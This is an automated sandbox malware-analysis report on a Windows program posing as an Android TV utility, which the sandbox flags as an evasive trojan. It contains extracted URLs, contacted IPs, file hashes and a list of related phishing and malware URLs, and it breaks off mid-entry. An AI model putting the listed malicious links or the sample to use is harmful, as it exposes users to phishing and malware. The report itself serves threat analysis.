https://kutt.it/stn_bridge_atvtmp8939.bat.0.drfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.tdtchannels.com/listastmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://f-droid.org/repo/news.androidtv.launchonboot_12.apktmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.androidpolice.com/2021/01/30/how-to-remap-remote-buttons-take-screenshot-chromecast-withtmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/0x192/universal-android-debloater/releases/download/%ver_debloater%/uad_gui-windotmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/0x192/universal-android-debloater/wiki/FAQtmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://iptv-org.github.io/tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/c50svchost.exe, 0000000C.00000002.3240662557.000001C0DF2C6000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.reddit.com/r/AndroidTV/tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.androidtv-guide.com/tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.reddit.com/r/AndroidTV/comments/1ajkxbk/tool_allinone_tool_for_windows_android_tv_tools_Android TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/attachments/google-installer_3-0-apk.6052043/tmp8939.bat.0.drfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000C.00000003.2009056822.000001C0DEFA0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drfalse
  • URL Reputation: safe
unknown
https://gitlab.com/AuroraOSS/AuroraStore/uploads/ac32503aee88c6d1067dad57f3f92e09/AuroraStore_4.3.5.tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://play.google.com/store/apps/details?id=com.tdtchannels.playertmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com:443/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exesvchost.exe, 0000000C.00000002.3240579838.000001C0DF260000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://api.github.com/repos/mirfatif/PermissionManagerX/releases/latesttmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/attachments/aapt-arm-pie-zip.6053069/tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://play.google.com/store/apps/details?id=flar2.homebuttontmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://api.github.com/repos/K3V1991/ADB-and-FastbootPlusPlus/releases/latesttmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://api.github.com/repos/codefaktor/FTVLaunchX/releases/latesttmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/svchost.exe, 0000000C.00000002.3240453687.000001C0DF200000.00000004.00000020.00020000.00000000.sdmptrue
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/Genymobile/scrcpy/blob/master/doc/shortcuts.md#shortcutstmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://api.github.com/repos/spocky/miproja1/releases/latesttmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/K3V1991/ADB-and-FastbootPlusPlus/releases/download/%ver_adb%/ADB-and-Fastboottmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://objects.githubusercontent.com/github-production-release-asset-2e65be/50417431/6e51c424-c3ca-svchost.exe, 0000000C.00000002.3240662557.000001C0DF2E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3239974063.000001C0DA302000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://mirfatif.github.io/PermissionManagerX/tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://api.github.com/repos/0x192/universal-android-debloater/releasestmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exeAC:edb.log.12.drfalse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/attachments/google-play-store_v38-7-29-apk.6052033/tmp8939.bat.0.drfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/attachments/countries-list-txt.6067313/tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.adslzone.net/reportajes/tv-streaming/que-es-tecnologia-iptv/#395576-que-son-las-listas-itmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/attachments/google-tv-home_1-0-591121582-apk.6051727/tmp8939.bat.0.drfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://kutt.it/stn_bridge_amazontmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/codefaktor/FTVLaunchX/releases/download/v1.0.1/FTVLaunchX-1.0.1.apktmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/0x192/universal-android-debloater#universal-android-debloater-guitmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://adguard.com/adguard-android-tv/overview.htmltmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://api.github.com/repos/realOxy/M3UAndroid/releases/latesttmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/t/tool-all-in-one-tool-for-windows-android-tv-tools-v2.4648239/Android TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://9to5google.com/guides/android-tv/tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://play.google.com/store/apps/details?id=%%%%jtmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://play.google.com/store/apps/details?id=com.neilturner.aerialviewstmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/attachments/wifi-pro-ftp-server_v1-9-5-build-74-apk.5924749/tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://gitlab.com/flauncher/flauncher/-/releases/0.18.0/downloads/flauncher-0.18.0.apktmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://play.google.com/store/apps/details?id=org.xbmc.koditmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/t/how-to-prepare-smartwatch-for-advanced-functions.4511103/tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://play.google.com/store/apps/details?id=ar.tvplayer.tvtmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/Genymobile/scrcpytmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://api.github.com/repos/Genymobile/scrcpy/releases/latesttmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/codefaktor/FTVLaunchX/blob/develop/README.mdtmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
http://crl.ver)svchost.exe, 0000000C.00000002.3240453687.000001C0DF210000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://smarttubeapp.github.io/tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/Genymobile/scrcpy/releases/download/%ver_scrcpy%/scrcpy-win%arquitectura_windows%tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/Free-TV/IPTV?tab=readme-ov-file#free-tvtmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://kutt.it/stn_betatmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://ipinfo.iotmp8939.bat.0.drfalse
  • URL Reputation: safe
unknown
https://play.google.com/store/apps/details?id=com.wiseplaytmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://g.live.com/odclientsettings/Prod/C:edb.log.12.drfalse
  • URL Reputation: safe
unknown
https://xdaforums.com/attachments/google-play-apk.6050959/tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://xdaforums.com/c/android-tv.4276/tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://apkins.aptoide.com/AptoideTV-5.1.2.apktmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://objects.githubusercontent.com:443svchost.exe, 0000000C.00000002.3240579838.000001C0DF260000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/K3V1991/ADB-and-FastbootPlusPlusAndroid TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/iptv-org/iptv?tab=readme-ov-file#playliststmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
http://agrd.io/tvapktmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://objects.githubusercontent.com/svchost.exe, 0000000C.00000002.3240662557.000001C0DF2D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3240579838.000001C0DF295000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://mirfatif.github.io/PermissionManagerX/help/en/tmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/mirfatif/PermissionManagerX/releases/download/%ver_PMX%/PMX_%ver_PMX%.apktmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown
https://kutt.it/stn_stabletmp8939.bat.0.drfalse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
142.250.186.46
google.comUnited States
15169GOOGLEUSfalse
185.199.108.133
objects.githubusercontent.comNetherlands
54113FASTLYUSfalse
140.82.121.4
github.comUnited States
36459GITHUBUStrue

Private

IP
127.0.0.1

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1447534
Start date and time:2024-05-25 20:58:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 33s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Android TV Tools v3_ES.exe
Detection:MAL
Classification:mal88.troj.evad.winEXE@23/14@3/4
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 22
  • Number of non-executed functions: 19
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

TimeTypeDescription
14:58:55API Interceptor43x Sleep call for process: powershell.exe modified
14:58:56API Interceptor2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
185.199.108.133https://github.com/skeeto/w64devkit/releases/download/v1.23.0/w64devkit-1.23.0.zipGet hashmaliciousUnknownBrowse
    http://toenpocket.pro/Get hashmaliciousHTMLPhisherBrowse
      https://io-trezorsuite.com/Get hashmaliciousUnknownBrowse
        VwjpUyPk2S.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
          https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
            SecuriteInfo.com.Win32.Trojan-Stealer.Cordimik.1U8UVG.23988.15011.exeGet hashmaliciousRedLineBrowse
              SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                http://nervous-seed-snowplow.glitch.meGet hashmaliciousUnknownBrowse
                  http://selliliar.liveGet hashmaliciousUnknownBrowse
                    http://img.myflixer.pwGet hashmaliciousHTMLPhisherBrowse
                      140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                      • github.com/ssbb36/stv/raw/main/5.mp3

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      github.comSecuriteInfo.com.Win32.Malware-gen.11603.24824.exeGet hashmaliciousUnknownBrowse
                      • 140.82.121.10
                      SecuriteInfo.com.Win32.Malware-gen.11603.24824.exeGet hashmaliciousUnknownBrowse
                      • 140.82.121.9
                      KpPUQs67Wj.jarGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      https://github.com/skeeto/w64devkit/releases/download/v1.23.0/w64devkit-1.23.0.zipGet hashmaliciousUnknownBrowse
                      • 140.82.121.4
                      Proof of payment.jarGet hashmaliciousSTRRATBrowse
                      • 140.82.121.3
                      Proof of payment.jarGet hashmaliciousSTRRATBrowse
                      • 140.82.121.3
                      https://io-trezorsuite.com/Get hashmaliciousUnknownBrowse
                      • 140.82.121.3
                      https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                      • 140.82.121.3
                      https://github.com/Edoumou/T-Grant/files/15404347/2023.COMPLETE.TAX.ORGANIZER.pdf.zipGet hashmaliciousUnknownBrowse
                      • 140.82.121.3
                      objects.githubusercontent.comhttps://github.com/skeeto/w64devkit/releases/download/v1.23.0/w64devkit-1.23.0.zipGet hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      https://io-trezorsuite.com/Get hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      https://github.com/Edoumou/T-Grant/files/15404347/2023.COMPLETE.TAX.ORGANIZER.pdf.zipGet hashmaliciousUnknownBrowse
                      • 185.199.111.133
                      https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                      • 185.199.111.133
                      SecuriteInfo.com.Win64.DropperX-gen.22747.2720.exeGet hashmaliciousUnknownBrowse
                      • 185.199.110.133
                      SecuriteInfo.com.Win64.DropperX-gen.22747.2720.exeGet hashmaliciousUnknownBrowse
                      • 185.199.110.133
                      SecuriteInfo.com.Win64.SpywareX-gen.2363.7900.exeGet hashmaliciousUnknownBrowse
                      • 185.199.111.133
                      SecuriteInfo.com.Win64.SpywareX-gen.2363.7900.exeGet hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      https://github.com/jmeubank/tdm-gcc/releases/download/v10.3.0-tdm64-2/tdm64-gcc-10.3.0-2.exeGet hashmaliciousUnknownBrowse
                      • 185.199.111.133

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      GITHUBUSSecuriteInfo.com.Win32.Malware-gen.11603.24824.exeGet hashmaliciousUnknownBrowse
                      • 140.82.121.10
                      SecuriteInfo.com.Win32.Malware-gen.11603.24824.exeGet hashmaliciousUnknownBrowse
                      • 140.82.121.9
                      KpPUQs67Wj.jarGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      https://github.com/skeeto/w64devkit/releases/download/v1.23.0/w64devkit-1.23.0.zipGet hashmaliciousUnknownBrowse
                      • 140.82.121.4
                      Proof of payment.jarGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      Proof of payment.jarGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      http://toenpocket.pro/Get hashmaliciousHTMLPhisherBrowse
                      • 140.82.112.21
                      https://io-trezorsuite.com/Get hashmaliciousUnknownBrowse
                      • 140.82.121.3
                      https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                      • 140.82.121.3
                      https://github.com/Edoumou/T-Grant/files/15404347/2023.COMPLETE.TAX.ORGANIZER.pdf.zipGet hashmaliciousUnknownBrowse
                      • 140.82.121.3
                      FASTLYUShttps://tryubv01.pages.dev/Get hashmaliciousUnknownBrowse
                      • 151.101.129.16
                      http://att-109494-103297.square.site/Get hashmaliciousUnknownBrowse
                      • 151.101.129.46
                      http://delicious-decorous-army.glitch.me/public/RRENFCONL0.HTMLGet hashmaliciousHTMLPhisherBrowse
                      • 151.101.192.84
                      https://uuyy112200.wixsite.com/my-site-2Get hashmaliciousUnknownBrowse
                      • 151.101.194.217
                      http://servty467.wixsite.com/csuadmin24Get hashmaliciousUnknownBrowse
                      • 151.101.194.217
                      https://lucah141.my-telegram.my.id/Get hashmaliciousUnknownBrowse
                      • 151.101.130.137
                      https://bitly.cx/LmuIzGet hashmaliciousUnknownBrowse
                      • 151.101.130.137
                      https://steamcomnumitly.com/get/spring/afaFJ4a/50Get hashmaliciousUnknownBrowse
                      • 151.101.130.137
                      https://dna-id-xv-news.resmi69.my.id/Get hashmaliciousUnknownBrowse
                      • 151.101.65.229
                      https://clientes-entrega.top/gin/billing.phpGet hashmaliciousUnknownBrowse
                      • 151.101.1.229

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      28a2c9bd18a11de089ef85a160da29e4https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://alsamah.ae/products/&ved=2ahUKEwjF9YHzr6WGAxW4EFkFHSf6BdcQjBB6BAgVEAE&usg=AOvVaw3Td0ZMPQIvFh2L-u6lkLFbGet hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      RRzU5xqSZH.exeGet hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      IGHpHq1KPO.exeGet hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      https://clncapassasetmanement.store/T8lld8Get hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      http://azuremail.ca/passerelle.php?id_envoi_courriel=5806909&lien=//xenbel.net/checker2Get hashmaliciousHTMLPhisherBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/Get hashmaliciousTechSupportScamBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      https://serviceclient.akomeryemrentals.inovaperf.me/aurelie.--_--boichard%40/bellatrix.l--_--estrange%40/daniell--_--marchand/innocenti.--_--patrick/Get hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      http://moctle.com/Get hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      https://rechrgerte.sbs/Get hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      • 140.82.121.4
                      https://rechrgerte.xyz/Get hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      • 140.82.121.4

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.8523269133583322
                      Encrypted:false
                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug2:gJjJGtpTq2yv1AuNZRY3diu8iBVqFa
                      MD5:814D634641CD55C36DAD4F421CF04D76
                      SHA1:B015E27851F3EE020F3062F66EBA90513174485C
                      SHA-256:47F1028D26FC58C79396C41797C5F3DE2CCF440C65E67D1D162EF0F53A87B633
                      SHA-512:D851553E580862DBCC6A7BE78CB6CE61D6E935EF51D3217719405664C1BA4D4BB4A85663F6F73593EA12E48BD2CE40D3C9F0F6CCE0C83EC4DD276472083F3935
                      Malicious:false
                      Reputation:low
                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x530d4801, page size 16384, DirtyShutdown, Windows version 10.0
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.6585572789694413
                      Encrypted:false
                      SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                      MD5:0E34C95158D65A40F85B6D92386DC6E6
                      SHA1:1E2B42DCDCFC7F80B395885775026BA545AC192F
                      SHA-256:6DE87C16CAF7F826CC7B3A4D9652C4DDE7BF59308CEB2ADEC47C12F2CEEBEDC6
                      SHA-512:BA42959BC80E506C51850034CF2E6169FBB45B00DC1C5EEF760673E67833E94400DCC52269566DBD2FBEBBF8826F4646A15C093F0F32D84F564E6B67BA447A81
                      Malicious:false
                      Reputation:low
                      Preview:S.H.... ...............X\...;...{......................0.z..........{..8:...|i.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................Pu?Y8:...|......................8:...|i..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):16384
                      Entropy (8bit):0.08179504249721575
                      Encrypted:false
                      SSDEEP:3:A1KYeqUcobr5ekGuAJkhvekl12qxZo/llAllrekGltll/SPj:A1KzIa5trxlUqfoAJe3l
                      MD5:524569E7F9A1FAB562B3192A53EB5B19
                      SHA1:45C125C2E5F7BD6FD058C28B6D1311D3B2FE9558
                      SHA-256:7965359BAF29CAAE09D43732FA57C7B8DB1B305C1EDDC4817BFB24C8AE14FF19
                      SHA-512:834F390724D87BD35706557AED13A3BFD620E8F41936272C97068B78A34CA64197F5BD06D368A5FB3C582737240B0F62EF4BD22A022DE72690CB5BEF5085127C
                      Malicious:false
                      Preview:.@9p.....................................;...{..8:...|i......{...............{.......{...XL......{......................8:...|i.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2032
                      Entropy (8bit):5.549377431500846
                      Encrypted:false
                      SSDEEP:48:2TyFWSU4y4RQmFoUeUmfmZ9tK8NWR8sYdWwAR11XWKGEqD:CmLHyIFKLFOZ2KWHYdWbRbrPqD
                      MD5:0E4903CB589B46BA5361303251CE9E90
                      SHA1:3E5D54D8EAFE07AB5BBDDC506EB8BFE307B1A8D7
                      SHA-256:CA151D11CBF2C05FDBACEE7E0B7FA948FAFACB364EFDFDF9CA3437745F247E99
                      SHA-512:1AFD9B87DA8A37DEB6B8A16DDAFC761FFAAF6C40484A3F327733A9EC2F5BFE10DBBB7D95B777F7A321725DF3408C13C237C0B2B75D2807C461183A949E48901B
                      Malicious:false
                      Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22d2yuhe.3zv.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4sc2c22.g0k.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaqpxry4.snk.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5jqbz44.kz5.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe

                      Download File
                      Process:C:\Users\user\Desktop\Android TV Tools v3_ES.exe
                      File Type:ASCII text, with no line terminators
